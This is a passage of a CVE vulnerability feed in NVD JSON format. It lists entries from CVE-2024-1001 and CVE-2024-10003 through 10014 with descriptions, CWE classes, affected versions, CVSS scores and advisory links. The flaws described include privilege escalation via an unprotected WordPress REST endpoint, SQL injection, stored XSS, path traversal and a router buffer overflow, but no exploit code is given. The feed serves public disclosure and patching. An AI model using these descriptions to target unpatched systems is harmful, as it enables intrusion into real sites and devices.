"cpe:2.3:a:roveridx:rover_idx:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "3.0.0.2906", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-10-22T05:15Z", "lastModifiedDate" : "2024-10-25T21:20Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10003", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/cdf67099-5514-45ba-9a4c-10af984bf593?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/cdf67099-5514-45ba-9a4c-10af984bf593?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/rover-idx/tags/3.0.0.2903/admin/rover-panel-setup.php#L76", "name" : "https://plugins.trac.wordpress.org/browser/rover-idx/tags/3.0.0.2903/admin/rover-panel-setup.php#L76", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/rover-idx/tags/3.0.0.2903/admin/rover-panel-setup.php#L120", "name" : "https://plugins.trac.wordpress.org/browser/rover-idx/tags/3.0.0.2903/admin/rover-panel-setup.php#L120", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/rover-idx/tags/3.0.0.2903/admin/rover-panel-setup.php#L152", "name" : "https://plugins.trac.wordpress.org/browser/rover-idx/tags/3.0.0.2903/admin/rover-panel-setup.php#L152", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/rover-idx/tags/3.0.0.2903/admin/rover-panel-setup.php#L199", "name" : "https://plugins.trac.wordpress.org/browser/rover-idx/tags/3.0.0.2903/admin/rover-panel-setup.php#L199", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/rover-idx/tags/3.0.0.2903/admin/rover-panel-setup.php#L225", "name" : "https://plugins.trac.wordpress.org/browser/rover-idx/tags/3.0.0.2903/admin/rover-panel-setup.php#L225", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/rover-idx/tags/3.0.0.2903/admin/rover-panel-setup.php#L240", "name" : "https://plugins.trac.wordpress.org/browser/rover-idx/tags/3.0.0.2903/admin/rover-panel-setup.php#L240", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/rover-idx/tags/3.0.0.2903/admin/rover-panel-setup.php#L270", "name" : "https://plugins.trac.wordpress.org/browser/rover-idx/tags/3.0.0.2903/admin/rover-panel-setup.php#L270", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3171681/rover-idx", "name" : "https://plugins.trac.wordpress.org/changeset/3171681/rover-idx", "refsource" : "", "tags" : [ "Patch" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Rover IDX plugin for WordPress is vulnerable to unauthorized access, modification, and loss of data due to a missing capability check on multiple functions in all versions up to, and including, 3.0.0.2903. This makes it possible for authenticated attackers, with subscriber-level access and above, to add, modify, or delete plugin options." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:roveridx:rover_idx:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "3.0.0.2905", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "LOW", "baseScore" : 6.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.4 } }, "publishedDate" : "2024-10-22T05:15Z", "lastModifiedDate" : "2024-10-25T21:19Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10004", "ASSIGNER" : "security@mozilla.org" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1904885", "name" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1904885", "refsource" : "", "tags" : [ "Issue Tracking", "Permissions Required" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-54/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-54/", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Opening an external link to an HTTP website when Firefox iOS was previously closed and had an HTTPS tab open could in some cases result in the padlock icon showing an HTTPS indicator incorrectly This vulnerability affects Firefox for iOS < 131.2." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mozilla:firefox:*:*:*:*:*:*:*:*", "versionEndExcluding" : "131.2.0", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-10-15T22:15Z", "lastModifiedDate" : "2025-04-04T14:36Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10005", "ASSIGNER" : "security@hashicorp.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-22" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://discuss.hashicorp.com/t/hcsec-2024-22-consul-l7-intentions-vulnerable-to-url-path-bypass", "name" : "https://discuss.hashicorp.com/t/hcsec-2024-22-consul-l7-intentions-vulnerable-to-url-path-bypass", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://security.netapp.com/advisory/ntap-20250110-0004/", "name" : "https://security.netapp.com/advisory/ntap-20250110-0004/", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was identified in Consul and Consul Enterprise (“Consul”) such that using URL paths in L7 traffic intentions could bypass HTTP request path-based access rules." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:hashicorp:consul:*:*:*:*:enterprise:*:*:*", "versionStartIncluding" : "1.19.0", "versionEndExcluding" : "1.19.3", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:hashicorp:consul:*:*:*:*:enterprise:*:*:*", "versionStartIncluding" : "1.18.0", "versionEndExcluding" : "1.18.5", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:hashicorp:consul:1.20.0:*:*:*:enterprise:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:hashicorp:consul:*:*:*:*:enterprise:*:*:*", "versionStartIncluding" : "1.9.0", "versionEndExcluding" : "1.15.15", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:hashicorp:consul:*:*:*:*:community:*:*:*", "versionStartIncluding" : "1.4.1", "versionEndExcluding" : "1.20.1", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "CHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.8, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.9, "impactScore" : 1.4 } }, "publishedDate" : "2024-10-30T22:15Z", "lastModifiedDate" : "2025-01-10T13:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10006", "ASSIGNER" : "security@hashicorp.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-116" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://discuss.hashicorp.com/t/hcsec-2024-23-consul-l7-intentions-vulnerable-to-headers-bypass", "name" : "https://discuss.hashicorp.com/t/hcsec-2024-23-consul-l7-intentions-vulnerable-to-headers-bypass", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://security.netapp.com/advisory/ntap-20250110-0005/", "name" : "https://security.netapp.com/advisory/ntap-20250110-0005/", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was identified in Consul and Consul Enterprise (“Consul”) such that using Headers in L7 traffic intentions could bypass HTTP header based access rules." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:hashicorp:consul:*:*:*:*:enterprise:*:*:*", "versionStartIncluding" : "1.19.0", "versionEndExcluding" : "1.19.3", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:hashicorp:consul:*:*:*:*:enterprise:*:*:*", "versionStartIncluding" : "1.18.0", "versionEndExcluding" : "1.18.5", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:hashicorp:consul:1.20.0:*:*:*:enterprise:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:hashicorp:consul:*:*:*:*:enterprise:*:*:*", "versionStartIncluding" : "1.9.0", "versionEndExcluding" : "1.15.15", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:hashicorp:consul:*:*:*:*:community:*:*:*", "versionStartIncluding" : "1.4.1", "versionEndExcluding" : "1.20.1", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "CHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.8, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.9, "impactScore" : 1.4 } }, "publishedDate" : "2024-10-30T22:15Z", "lastModifiedDate" : "2025-01-10T13:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10007", "ASSIGNER" : "product-cna@github.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.17", "name" : "https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.17", "refsource" : "", "tags" : [ ] }, { "url" : "https://docs.github.com/en/enterprise-server@3.12/admin/release-notes#3.12.11", "name" : "https://docs.github.com/en/enterprise-server@3.12/admin/release-notes#3.12.11", "refsource" : "", "tags" : [ ] }, { "url" : "https://docs.github.com/en/enterprise-server@3.13/admin/release-notes#3.13.6", "name" : "https://docs.github.com/en/enterprise-server@3.13/admin/release-notes#3.13.6", "refsource" : "", "tags" : [ ] }, { "url" : "https://docs.github.com/en/enterprise-server@3.14/admin/release-notes#3.14.3", "name" : "https://docs.github.com/en/enterprise-server@3.14/admin/release-notes#3.14.3", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A path collision and arbitrary code execution vulnerability was identified in GitHub Enterprise Server that allowed container escape to escalate to root via ghe-firejail path. Exploitation of this vulnerability requires Enterprise Administrator access to the GitHub Enterprise Server instance. This vulnerability affected all versions of GitHub Enterprise prior to 3.15 and was fixed in versions 3.14.3, 3.13.6, 3.12.11, and 3.11.17. This vulnerability was reported via the GitHub Bug Bounty program." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-11-07T21:15Z", "lastModifiedDate" : "2024-11-08T19:01Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10008", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/learning-management-system/tags/1.13.3//includes/RestApi/Controllers/Version1/UsersController.php#L1726", "name" : "https://plugins.trac.wordpress.org/browser/learning-management-system/tags/1.13.3//includes/RestApi/Controllers/Version1/UsersController.php#L1726", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/0c54166e-2af2-409d-8c67-9c07f2028543?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/0c54166e-2af2-409d-8c67-9c07f2028543?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Masteriyo LMS – eLearning and Online Course Builder for WordPress plugin for WordPress is vulnerable to unauthorized user profile modification due to missing authorization checks on the /wp-json/masteriyo/v1/users/$id REST API endpoint in all versions up to, and including, 1.13.3. This makes it possible for authenticated attackers, with student-level access and above, to modify the roles of arbitrary users. As a result, attackers can escalate their privileges to the Administrator and demote existing administrators to students." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:masteriyo:masteriyo:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.13.4", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "HIGH", "availabilityImpact" : "NONE", "baseScore" : 6.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-10-29T06:15Z", "lastModifiedDate" : "2025-05-17T01:43Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10009", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/c2b1f9f4-d5f3-4975-afd1-50eaf193e2ab/", "name" : "https://wpscan.com/vulnerability/c2b1f9f4-d5f3-4975-afd1-50eaf193e2ab/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/c2b1f9f4-d5f3-4975-afd1-50eaf193e2ab/", "name" : "https://wpscan.com/vulnerability/c2b1f9f4-d5f3-4975-afd1-50eaf193e2ab/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Melapress File Monitor WordPress plugin before 2.1.0 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:melapress:melapress_file_monitor:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.1.0", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2025-05-15T20:15Z", "lastModifiedDate" : "2025-06-11T19:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-1001", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-121" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-main-942df77e9c70495390e4aed2a29f3d13?pvs=4", "name" : "https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-main-942df77e9c70495390e4aed2a29f3d13?pvs=4", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252270", "name" : "https://vuldb.com/?ctiid.252270", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252270", "name" : "https://vuldb.com/?id.252270", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-main-942df77e9c70495390e4aed2a29f3d13?pvs=4", "name" : "https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-main-942df77e9c70495390e4aed2a29f3d13?pvs=4", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252270", "name" : "https://vuldb.com/?id.252270", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252270", "name" : "https://vuldb.com/?ctiid.252270", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical has been found in Totolink N200RE 9.3.5u.6139_B20201216. Affected is the function main of the file /cgi-bin/cstecgi.cgi. The manipulation leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-252270 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:totolink:n200re_firmware:9.3.5u.6139_b20201216:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:totolink:n200re:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-29T14:15Z", "lastModifiedDate" : "2024-11-21T08:49Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10010", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/8a258d33-a354-4cbb-bfcb-31b7f1b1a036/", "name" : "https://wpscan.com/vulnerability/8a258d33-a354-4cbb-bfcb-31b7f1b1a036/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The LearnPress WordPress plugin before 4.2.7.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "4.2.7.2", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-12-12T06:15Z", "lastModifiedDate" : "2025-05-07T13:28Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10011", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-22" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://codex.buddypress.org/releases/version-14-2-1/", "name" : "https://codex.buddypress.org/releases/version-14-2-1/", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://github.com/buddypress/buddypress/blob/master/src/bp-core/bp-core-avatars.php#L1270", "name" : "https://github.com/buddypress/buddypress/blob/master/src/bp-core/bp-core-avatars.php#L1270", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://github.com/buddypress/buddypress/blob/master/src/bp-core/bp-core-avatars.php#L1370", "name" : "https://github.com/buddypress/buddypress/blob/master/src/bp-core/bp-core-avatars.php#L1370", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3173924/buddypress/trunk/bp-core/bp-core-avatars.php?contextall=1&old=3102524&old_path=%2Fbuddypress%2Ftrunk%2Fbp-core%2Fbp-core-avatars.php", "name" : "https://plugins.trac.wordpress.org/changeset/3173924/buddypress/trunk/bp-core/bp-core-avatars.php?contextall=1&old=3102524&old_path=%2Fbuddypress%2Ftrunk%2Fbp-core%2Fbp-core-avatars.php", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/4327f414-64f4-4193-a5c0-2a5ecdd75e11?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/4327f414-64f4-4193-a5c0-2a5ecdd75e11?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The BuddyPress plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 14.1.0 via the id parameter. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform actions on files outside of the originally intended directory and enables file uploads to directories outside of the web root. Depending on server configuration it may be possible to upload files with double extensions. This vulnerability only affects Windows." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:buddypress:buddypress:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "14.1.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "NONE", "baseScore" : 8.1, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.2 } }, "publishedDate" : "2024-10-25T07:15Z", "lastModifiedDate" : "2024-11-06T16:01Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10012", "ASSIGNER" : "security@progress.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://docs.telerik.com/devtools/wpf/knowledge-base/kb-security-unsafe-deserialization-cve-2024-10012", "name" : "https://docs.telerik.com/devtools/wpf/knowledge-base/kb-security-unsafe-deserialization-cve-2024-10012", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In Progress Telerik UI for WPF versions prior to 2024 Q4 (2024.4.1111), a code execution attack is possible through an insecure deserialization vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:telerik:ui_for_wpf:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2024.4.1111", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-11-13T16:15Z", "lastModifiedDate" : "2025-01-07T15:59Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10013", "ASSIGNER" : "security@progress.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-502" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://docs.telerik.com/devtools/winforms/knowledge-base/unsafe-deserialization-cve-2024-10013", "name" : "https://docs.telerik.com/devtools/winforms/knowledge-base/unsafe-deserialization-cve-2024-10013", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In Progress Telerik UI for WinForms versions prior to 2024 Q4 (2024.4.1113), a code execution attack is possible through an insecure deserialization vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:progress:telerik_ui_for_winforms:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2024.4.1113", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-11-13T16:15Z", "lastModifiedDate" : "2025-07-03T18:30Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10014", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/ec5474ac-62d7-4431-b789-51c831dd1c20?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/ec5474ac-62d7-4431-b789-51c831dd1c20?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://wordpress.org/plugins/flat-ui-button/#developers", "name" : "https://wordpress.org/plugins/flat-ui-button/#developers", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Flat UI Button plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's flatbtn shortcode in version 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:tiandiyoyo:flat_ui_button:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-10-18T05:15Z", "lastModifiedDate" : "2024-10-29T16:58Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : 